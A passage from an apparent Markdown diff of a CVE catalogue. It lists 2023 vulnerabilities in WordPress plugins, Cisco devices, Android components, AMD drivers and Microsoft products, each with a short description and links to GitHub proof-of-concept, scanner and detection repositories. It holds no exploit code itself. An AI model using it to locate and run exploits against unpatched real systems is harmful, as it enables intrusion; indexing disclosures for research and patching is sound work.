-ano mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 4.1.0 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [FuBoLuSec/CVE-2023-6895](https://github.com/FuBoLuSec/CVE-2023-6895) +- [nles-crt/CVE-2023-6895](https://github.com/nles-crt/CVE-2023-6895) + +### CVE-2023-6933 (2024-02-05) + +The Better Search Replace plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.4 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + + +- [w2xim3/CVE-2023-6933](https://github.com/w2xim3/CVE-2023-6933) + +### CVE-2023-6985 (2024-02-05) + +The 10Web AI Assistant – AI content writing assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin AJAX action in all versions up to, and including, 1.0.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins that can be used to gain further access to a compromised site. + + +- [RandomRobbieBF/CVE-2023-6985](https://github.com/RandomRobbieBF/CVE-2023-6985) + +### CVE-2023-7016 (2024-02-27) + +A flaw in Thales SafeNet Authentication Client prior to 10.8 R10 on Windows allows an attacker to execute code at a SYSTEM level via local access. + + +- [ewilded/CVE-2023-7016-POC](https://github.com/ewilded/CVE-2023-7016-POC) + +### CVE-2023-7028 (2024-01-12) + +An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address. + + +- [RandomRobbieBF/CVE-2023-7028](https://github.com/RandomRobbieBF/CVE-2023-7028) +- [googlei1996/CVE-2023-7028](https://github.com/googlei1996/CVE-2023-7028) +- [duy-31/CVE-2023-7028](https://github.com/duy-31/CVE-2023-7028) +- [Vozec/CVE-2023-7028](https://github.com/Vozec/CVE-2023-7028) +- [yoryio/CVE-2023-7028](https://github.com/yoryio/CVE-2023-7028) +- [Esonhugh/gitlab_honeypot](https://github.com/Esonhugh/gitlab_honeypot) +- [Shimon03/CVE-2023-7028-Account-Take-Over-Gitlab](https://github.com/Shimon03/CVE-2023-7028-Account-Take-Over-Gitlab) +- [thanhlam-attt/CVE-2023-7028](https://github.com/thanhlam-attt/CVE-2023-7028) +- [Trackflaw/CVE-2023-7028-Docker](https://github.com/Trackflaw/CVE-2023-7028-Docker) +- [mochammadrafi/CVE-2023-7028](https://github.com/mochammadrafi/CVE-2023-7028) +- [hackeremmen/gitlab-exploit](https://github.com/hackeremmen/gitlab-exploit) +- [soltanali0/CVE-2023-7028](https://github.com/soltanali0/CVE-2023-7028) +- [gh-ost00/CVE-2023-7028](https://github.com/gh-ost00/CVE-2023-7028) + +### CVE-2023-7172 (2023-12-30) + +Eine kritische Schwachstelle wurde in PHPGurukul Hospital Management System 1.0 entdeckt. Es geht hierbei um eine nicht näher spezifizierte Funktion der Komponente Admin Dashboard. Durch Manipulieren mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. + + +- [sharathc213/CVE-2023-7172](https://github.com/sharathc213/CVE-2023-7172) + +### CVE-2023-7173 (2023-12-30) + +Es wurde eine problematische Schwachstelle in PHPGurukul Hospital Management System 1.0 gefunden. Es geht dabei um eine nicht klar definierte Funktion der Datei registration.php. Durch das Beeinflussen des Arguments First Name mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [sharathc213/CVE-2023-7173](https://github.com/sharathc213/CVE-2023-7173) + +### CVE-2023-7261 (2024-06-07) + +Inappropriate implementation in Google Updator prior to 1.3.36.351 in Google Chrome allowed a local attacker to perform privilege escalation via a malicious file. (Chromium security severity: High) + + +- [zerozenxlabs/CVE-2023-7261](https://github.com/zerozenxlabs/CVE-2023-7261) + +### CVE-2023-20025 (2023-01-19) + +A vulnerability in the web-based management interface of Cisco Small Business RV042 Series Routers could allow an unauthenticated, remote attacker to bypass authentication on the affected device.\r\n\r This vulnerability is due to incorrect user input validation of incoming HTTP packets. An attacker could exploit this vulnerability by sending crafted requests to the web-based management interface. A successful exploit could allow the attacker to gain root privileges on the affected device.\r\n + + +- [lnversed/CVE-2023-20025](https://github.com/lnversed/CVE-2023-20025) + +### CVE-2023-20048 (2023-11-01) + +A vulnerability in the web services interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to execute certain unauthorized configuration commands on a Firepower Threat Defense (FTD) device that is managed by the FMC Software. This vulnerability is due to insufficient authorization of configuration commands that are sent through the web service interface. An attacker could exploit this vulnerability by authenticating to the FMC web services interface and sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to execute certain configuration commands on the targeted FTD device. To successfully exploit this vulnerability, an attacker would need valid credentials on the FMC Software. + + +- [0zer0d4y/FuegoTest](https://github.com/0zer0d4y/FuegoTest) + +### CVE-2023-20052 (2023-02-16) + +On Feb 15, 2023, the following vulnerability in the ClamAV scanning library was disclosed:\r\n\r \r A vulnerability in the DMG file parser of ClamAV versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier could allow an unauthenticated, remote attacker to access sensitive information on an affected device.\r\n\r \r This vulnerability is due to enabling XML entity substitution that may result in XML external entity injection. An attacker could exploit this vulnerability by submitting a crafted DMG file to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to leak bytes from any file that may be read by the ClamAV scanning process. + + +- [nokn0wthing/CVE-2023-20052](https://github.com/nokn0wthing/CVE-2023-20052) +- [cY83rR0H1t/CVE-2023-20052](https://github.com/cY83rR0H1t/CVE-2023-20052) + +### CVE-2023-20073 (2023-04-05) + +A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device. + + +- [RegularITCat/CVE-2023-20073](https://github.com/RegularITCat/CVE-2023-20073) + +### CVE-2023-20110 (2023-05-18) + +A vulnerability in the web-based management interface of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. This vulnerability exists because the web-based management interface inadequately validates user input. An attacker could exploit this vulnerability by authenticating to the application as a low-privileged user and sending crafted SQL queries to an affected system. A successful exploit could allow the attacker to read sensitive data on the underlying database. + + +- [redfr0g/CVE-2023-20110](https://github.com/redfr0g/CVE-2023-20110) + +### CVE-2023-20126 (2023-05-04) + +A vulnerability in the web-based management interface of Cisco SPA112 2-Port Phone Adapters could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. This vulnerability is due to a missing authentication process within the firmware upgrade function. An attacker could exploit this vulnerability by upgrading an affected device to a crafted version of firmware. A successful exploit could allow the attacker to execute arbitrary code on the affected device with full privileges. Cisco has not released firmware updates to address this vulnerability. + + +- [fullspectrumdev/RancidCrisco](https://github.com/fullspectrumdev/RancidCrisco) + +### CVE-2023-20178 (2023-06-28) + +A vulnerability in the client update process of Cisco AnyConnect Secure Mobility Client Software for Windows and Cisco Secure Client Software for Windows could allow a low-privileged, authenticated, local attacker to elevate privileges to those of SYSTEM. The client update process is executed after a successful VPN connection is established.\r\n\r This vulnerability exists because improper permissions are assigned to a temporary directory that is created during the update process. An attacker could exploit this vulnerability by abusing a specific function of the Windows installer process. A successful exploit could allow the attacker to execute code with SYSTEM privileges. + + +- [Wh04m1001/CVE-2023-20178](https://github.com/Wh04m1001/CVE-2023-20178) + +### CVE-2023-20198 (2023-10-16) + +Cisco is providing an update for the ongoing investigation into observed exploitation of the web UI feature in Cisco IOS XE Software. We are updating the list of fixed releases and adding the Software Checker. Our investigation has determined that the actors exploited two previously unknown issues. The attacker first exploited CVE-2023-20198 to gain initial access and issued a privilege 15 command to create a local user and password combination. This allowed the user to log in with normal user access. The attacker then exploited another component of the web UI feature, leveraging the new local user to elevate privilege to root and write the implant to the file system. Cisco has assigned CVE-2023-20273 to this issue. CVE-2023-20198 has been assigned a CVSS Score of 10.0. CVE-2023-20273 has been assigned a CVSS Score of 7.2. Both of these CVEs are being tracked by CSCwh87343. + + +- [raystr-atearedteam/CVE-2023-20198-checker](https://github.com/raystr-atearedteam/CVE-2023-20198-checker) +- [Atea-Redteam/CVE-2023-20198](https://github.com/Atea-Redteam/CVE-2023-20198) +- [securityphoenix/cisco-CVE-2023-20198-tester](https://github.com/securityphoenix/cisco-CVE-2023-20198-tester) +- [emomeni/Simple-Ansible-for-CVE-2023-20198](https://github.com/emomeni/Simple-Ansible-for-CVE-2023-20198) +- [ZephrFish/CVE-2023-20198-Checker](https://github.com/ZephrFish/CVE-2023-20198-Checker) +- [JoyGhoshs/CVE-2023-20198](https://github.com/JoyGhoshs/CVE-2023-20198) +- [Tounsi007/CVE-2023-20198](https://github.com/Tounsi007/CVE-2023-20198) +- [alekos3/CVE_2023_20198_Detector](https://github.com/alekos3/CVE_2023_20198_Detector) +- [reket99/Cisco_CVE-2023-20198](https://github.com/reket99/Cisco_CVE-2023-20198) +- [iveresk/cve-2023-20198](https://github.com/iveresk/cve-2023-20198) +- [sohaibeb/CVE-2023-20198](https://github.com/sohaibeb/CVE-2023-20198) +- [fox-it/cisco-ios-xe-implant-detection](https://github.com/fox-it/cisco-ios-xe-implant-detection) +- [Pushkarup/CVE-2023-20198](https://github.com/Pushkarup/CVE-2023-20198) +- [Shadow0ps/CVE-2023-20198-Scanner](https://github.com/Shadow0ps/CVE-2023-20198-Scanner) +- [kacem-expereo/CVE-2023-20198](https://github.com/kacem-expereo/CVE-2023-20198) +- [mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner](https://github.com/mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner) +- [ohlawd/CVE-2023-20198](https://github.com/ohlawd/CVE-2023-20198) +- [IceBreakerCode/CVE-2023-20198](https://github.com/IceBreakerCode/CVE-2023-20198) +- [RevoltSecurities/CVE-2023-20198](https://github.com/RevoltSecurities/CVE-2023-20198) +- [smokeintheshell/CVE-2023-20198](https://github.com/smokeintheshell/CVE-2023-20198) +- [netbell/CVE-2023-20198-Fix](https://github.com/netbell/CVE-2023-20198-Fix) +- [Vulnmachines/Cisco_CVE-2023-20198](https://github.com/Vulnmachines/Cisco_CVE-2023-20198) +- [W01fh4cker/CVE-2023-20198-RCE](https://github.com/W01fh4cker/CVE-2023-20198-RCE) +- [sanan2004/CVE-2023-20198](https://github.com/sanan2004/CVE-2023-20198) +- [AhmedMansour93/Event-ID-193-Rule-Name-SOC231-Cisco-IOS-XE-Web-UI-ZeroDay-CVE-2023-20198-](https://github.com/AhmedMansour93/Event-ID-193-Rule-Name-SOC231-Cisco-IOS-XE-Web-UI-ZeroDay-CVE-2023-20198-) +- [XiaomingX/cve-2023-20198-poc](https://github.com/XiaomingX/cve-2023-20198-poc) + +### CVE-2023-20209 (2023-08-16) + +A vulnerability in the web-based management interface of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an authenticated, remote attacker with read-write privileges on the application to perform a command injection attack that could result in remote code execution on an affected device.\r\n\r This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface of an affected device. A successful exploit could allow the attacker to establish a remote shell with root privileges. + + +- [peter5he1by/CVE-2023-20209](https://github.com/peter5he1by/CVE-2023-20209) + +### CVE-2023-20273 (2023-10-24) + +A vulnerability in the web UI feature of Cisco IOS XE Software could allow an authenticated, remote attacker to inject commands with the privileges of root. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted input to the web UI. A successful exploit could allow the attacker to inject commands to the underlying operating system with root privileges. + + +- [smokeintheshell/CVE-2023-20273](https://github.com/smokeintheshell/CVE-2023-20273) + +### CVE-2023-20562 (2023-08-08) + +\n\n\nInsufficient validation in the IOCTL (Input Output Control) input buffer in AMD uProf may allow an authenticated user to load an unsigned driver potentially leading to arbitrary kernel execution.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n + + +- [zeze-zeze/HITCON-2023-Demo-CVE-2023-20562](https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562) +- [passwa11/HITCON-2023-Demo-CVE-2023-20562](https://github.com/passwa11/HITCON-2023-Demo-CVE-2023-20562) + +### CVE-2023-20573 (2024-01-11) + +A privileged attacker\ncan prevent delivery of debug exceptions to SEV-SNP guests potentially\nresulting in guests not receiving expected debug information.\n\n\n\n + + +- [Freax13/cve-2023-20573-poc](https://github.com/Freax13/cve-2023-20573-poc) + +### CVE-2023-20593 (2023-07-24) + +\nAn issue in “Zen 2” CPUs, under specific microarchitectural circumstances, may allow an attacker to potentially access sensitive information.\n\n\n\n\n\n\n + + +- [sbaresearch/stop-zenbleed-win](https://github.com/sbaresearch/stop-zenbleed-win) + +### CVE-2023-20598 (2023-10-17) + +\n\n\nAn improper privilege management in the AMD Radeon™ Graphics driver may allow an authenticated attacker to craft an IOCTL request to gain I/O control over arbitrary hardware ports or physical addresses resulting in a potential arbitrary code execution.\n\n\n\n + + +- [H4rk3nz0/CVE-2023-20598-PDFWKRNL](https://github.com/H4rk3nz0/CVE-2023-20598-PDFWKRNL) + +### CVE-2023-20860 (2023-03-27) + +Spring Framework running version 6.0.0 - 6.0.6 or 5.3.0 - 5.3.25 using "**" as a pattern in Spring Security configuration with the mvcRequestMatcher creates a mismatch in pattern matching between Spring Security and Spring MVC, and the potential for a security bypass. + + +- [limo520/CVE-2023-20860](https://github.com/limo520/CVE-2023-20860) + +### CVE-2023-20872 (2023-04-25) + +VMware Workstation and Fusion contain an out-of-bounds read/write vulnerability in SCSI CD/DVD device emulation. + + +- [ze0r/vmware-escape-CVE-2023-20872-poc](https://github.com/ze0r/vmware-escape-CVE-2023-20872-poc) + +### CVE-2023-20887 (2023-06-07) + +Aria Operations for Networks contains a command injection vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in remote code execution. + + +- [sinsinology/CVE-2023-20887](https://github.com/sinsinology/CVE-2023-20887) +- [miko550/CVE-2023-20887](https://github.com/miko550/CVE-2023-20887) +- [Malwareman007/CVE-2023-20887](https://github.com/Malwareman007/CVE-2023-20887) + +### CVE-2023-20909 (2023-04-19) + +In multiple functions of RunningTasks.java, there is a possible privilege escalation due to a missing privilege check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-243130512 + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20909](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20909) +- [Trinadh465/platform_frameworks_base_AOSP10_r33_CVE-2023-20909](https://github.com/Trinadh465/platform_frameworks_base_AOSP10_r33_CVE-2023-20909) + +### CVE-2023-20911 (2023-03-24) + +In addPermission of PermissionManagerServiceImpl.java , there is a possible failure to persist permission settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-242537498 + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20911](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20911) + +### CVE-2023-20918 (2023-07-12) + +In getPendingIntentLaunchFlags of ActivityOptions.java, there is a possible elevation of privilege due to a confused deputy with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918](https://github.com/pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918) +- [Trinadh465/platform_frameworks_base_CVE-2023-20918](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-20918) + +### CVE-2023-20921 (2023-01-24) + +In onPackageRemoved of AccessibilityManagerService.java, there is a possibility to automatically grant accessibility services due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-243378132 + + +- [Trinadh465/frameworks_base_android-6.0.1_r22_CVE-2023-20921](https://github.com/Trinadh465/frameworks_base_android-6.0.1_r22_CVE-2023-20921) + +### CVE-2023-20933 (2023-02-28) + +In several functions of MediaCodec.cpp, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-245860753 + + +- [Trinadh465/frameworks_av_CVE-2023-20933](https://github.com/Trinadh465/frameworks_av_CVE-2023-20933) +- [hshivhare67/platform_frameworks_av_AOSP10_r33_CVE-2023-20933](https://github.com/hshivhare67/platform_frameworks_av_AOSP10_r33_CVE-2023-20933) + +### CVE-2023-20943 (2023-02-28) + +In clearApplicationUserData of ActivityManagerService.java, there is a possible way to remove system files due to a path traversal error. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-240267890 + + +- [Trinadh465/frameworks_base_CVE-2023-20943](https://github.com/Trinadh465/frameworks_base_CVE-2023-20943) +- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20943](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20943) + +### CVE-2023-20944 (2023-02-28) + +In run of ChooseTypeAndAccountActivity.java, there is a possible escalation of privilege due to unsafe deserialization. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-244154558 + + +- [Trinadh465/frameworks_base_CVE-2023-20944](https://github.com/Trinadh465/frameworks_base_CVE-2023-20944) +- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20944](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20944) + +### CVE-2023-20945 (2023-02-28) + +In phNciNfc_MfCreateXchgDataHdr of phNxpExtns_MifareStd.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-246932269 + + +- [Ailenchick/CVE-2023-20945](https://github.com/Ailenchick/CVE-2023-20945) + +### CVE-2023-20955 (2023-03-24) + +In onPrepareOptionsMenu of AppInfoDashboardFragment.java, there is a possible way to bypass admin restrictions and uninstall applications for all users due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-258653813 + + +- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2023-20955](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2023-20955) + +### CVE-2023-20963 (2023-03-24) + +In WorkSource, there is a possible parcel mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-220302519 + + +- [pwnipc/BadParcel](https://github.com/pwnipc/BadParcel) +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20963](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20963) +- [Ailenchick/CVE-2023-20963](https://github.com/Ailenchick/CVE-2023-20963) + +### CVE-2023-21036 (2023-03-24) + +In BitmapExport.java, there is a possible failure to truncate images due to a logic error in the code.Product: AndroidVersions: Android kernelAndroid ID: A-264261868References: N/A + + +- [qixils/AntiCropalypse](https://github.com/qixils/AntiCropalypse) +- [infobyte/CVE-2023-21036](https://github.com/infobyte/CVE-2023-21036) +- [notaSWE/gocropalypse](https://github.com/notaSWE/gocropalypse) +- [lordofpipes/acropadetect](https://github.com/lordofpipes/acropadetect) + +### CVE-2023-21086 (2023-04-19) + +In isToggleable of SecureNfcEnabler.java and SecureNfcPreferenceController.java, there is a possible way to enable NFC from a secondary account due to a permissions bypass. This could lead to local escalation of privilege from the Guest account with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-238298970 + + +- [Trinadh465/packages_apps_Settings_CVE-2023-21086](https://github.com/Trinadh465/packages_apps_Settings_CVE-2023-21086) + +### CVE-2023-21094 (2023-04-19) + +In sanitize of LayerState.cpp, there is a possible way to take over the screen display and swap the display content due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-248031255 + + +- [Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21094](https://github.com/Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21094) + +### CVE-2023-21097 (2023-04-19) + +In toUriInner of Intent.java, there is a possible way to launch an arbitrary activity due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-261858325 + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21097](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21097) +- [uthrasri/frameworks_base_AOSP10_r33_CVE-2023-21097](https://github.com/uthrasri/frameworks_base_AOSP10_r33_CVE-2023-21097) + +### CVE-2023-21109 (2023-05-15) + +In multiple places of AccessibilityService, there is a possible way to hide the app from the user due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-261589597 + + +- [Trinadh465/frameworks_base_AOSP10_CVE-2023-21109r33_](https://github.com/Trinadh465/frameworks_base_AOSP10_CVE-2023-21109r33_) +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21109](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21109) + +### CVE-2023-21118 (2023-05-15) + +In unflattenString8 of Sensor.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-269014004 + + +- [Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21118](https://github.com/Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21118) +- [Satheesh575555/frameworks_native_AOSP10_r33_CVE-2023-21118](https://github.com/Satheesh575555/frameworks_native_AOSP10_r33_CVE-2023-21118) + +### CVE-2023-21144 (2023-06-15) + +In doInBackground of NotificationContentInflater.java, there is a possible temporary denial or service due to long running operations. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-252766417 + + +- [hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144_old](https://github.com/hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144_old) +- [hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144](https://github.com/hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144) + +### CVE-2023-21238 (2023-07-12) + +In visitUris of RemoteViews.java, there is a possible leak of images between users due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21238](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21238) + +### CVE-2023-21246 (2023-07-12) + +In ShortcutInfo of ShortcutInfo.java, there is a possible way for an app to retain notification listening access due to an uncaught exception. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21246](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21246) + +### CVE-2023-21251 (2023-07-12) + +In onCreate of ConfirmDialog.java, there is a possible way to connect to VNP bypassing user's consent due to improper input validation. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.\n\n + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21251](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21251) + +### CVE-2023-21272 (2023-08-14) + +In readFrom of Uri.java, there is a possible bad URI permission grant due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [Trinadh465/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272](https://github.com/Trinadh465/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272) +- [pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272](https://github.com/pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272) + +### CVE-2023-21275 (2023-08-14) + +In decideCancelProvisioningDialog of AdminIntegratedFlowPrepareActivity.java, there is a possible way to bypass factory reset protections due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [Trinadh465/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275](https://github.com/Trinadh465/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275) + +### CVE-2023-21281 (2023-08-14) + +In multiple functions of KeyguardViewMediator.java, there is a possible failure to lock after screen timeout due to a logic error in the code. This could lead to local escalation of privilege across users with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [Trinadh465/platform_frameworks_base_CVE-2023-21281](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21281) + +### CVE-2023-21282 (2023-08-14) + +In TRANSPOSER_SETTINGS of lpp_tran.h, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.\n\n + + +- [Trinadh465/external_aac_AOSP10_r33_CVE-2023-21282](https://github.com/Trinadh465/external_aac_AOSP10_r33_CVE-2023-21282) +- [Trinadh465/external_aac_android-4.2.2_r1_CVE-2023-21282](https://github.com/Trinadh465/external_aac_android-4.2.2_r1_CVE-2023-21282) + +### CVE-2023-21284 (2023-08-14) + +In multiple functions of DevicePolicyManager.java, there is a possible way to prevent enabling the Find my Device feature due to improper input validation. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21284](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21284) + +### CVE-2023-21285 (2023-08-14) + +In setMetadata of MediaSessionRecord.java, there is a possible way to view another user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [uthrasri/framework_base_CVE-2023-21285_NoPatch](https://github.com/uthrasri/framework_base_CVE-2023-21285_NoPatch) + +### CVE-2023-21286 (2023-08-14) + +In visitUris of RemoteViews.java, there is a possible way to reveal images across users due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [Trinadh465/platform_frameworks_base_CVE-2023-21286](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21286) + +### CVE-2023-21288 (2023-08-14) + +In visitUris of Notification.java, there is a possible way to reveal images across users due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [Trinadh465/platform_frameworks_base_CVE-2023-21288](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21288) + +### CVE-2023-21554 (2023-04-11) + +Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability + + +- [zoemurmure/CVE-2023-21554-PoC](https://github.com/zoemurmure/CVE-2023-21554-PoC) +- [3tternp/CVE-2023-21554](https://github.com/3tternp/CVE-2023-21554) + +### CVE-2023-21560 (2023-01-10) + +Windows Boot Manager Security Feature Bypass Vulnerability + + +- [Wack0/dubiousdisk](https://github.com/Wack0/dubiousdisk) + +### CVE-2023-21608 (2023-01-18) + +Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. + + +- [hacksysteam/CVE-2023-21608](https://github.com/hacksysteam/CVE-2023-21608) +- [Malwareman007/CVE-2023-21608](https://github.com/Malwareman007/CVE-2023-21608) + +### CVE-2023-21674 (2023-01-10) + +Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability + + +- [hd3s5aa/CVE-2023-21674](https://github.com/hd3s5aa/CVE-2023-21674) + +### CVE-2023-21707 (2023-02-14) + +Microsoft Exchange Server Remote Code Execution Vulnerability + + +- [N1k0la-T/CVE-2023-21707](https://github.com/N1k0la-T/CVE-2023-21707) + +### CVE-2023-21716 (2023-02-14) + +Microsoft Word Remote Code Execution Vulnerability + + +- [FeatherStark/CVE-2023-21716](https://github.com/FeatherStark/CVE-2023-21716) +- [Xnuvers007/CVE-2023-21716](https://github.com/Xnuvers007/CVE-2023-21716) +- [gyaansastra/CVE-2023-21716](https://github.com/gyaansastra/CVE-2023-21716) +- [mikesxrs/CVE-2023-21716_YARA_Results](https://github.com/mikesxrs/CVE-2023-21716_YARA_Results) +- 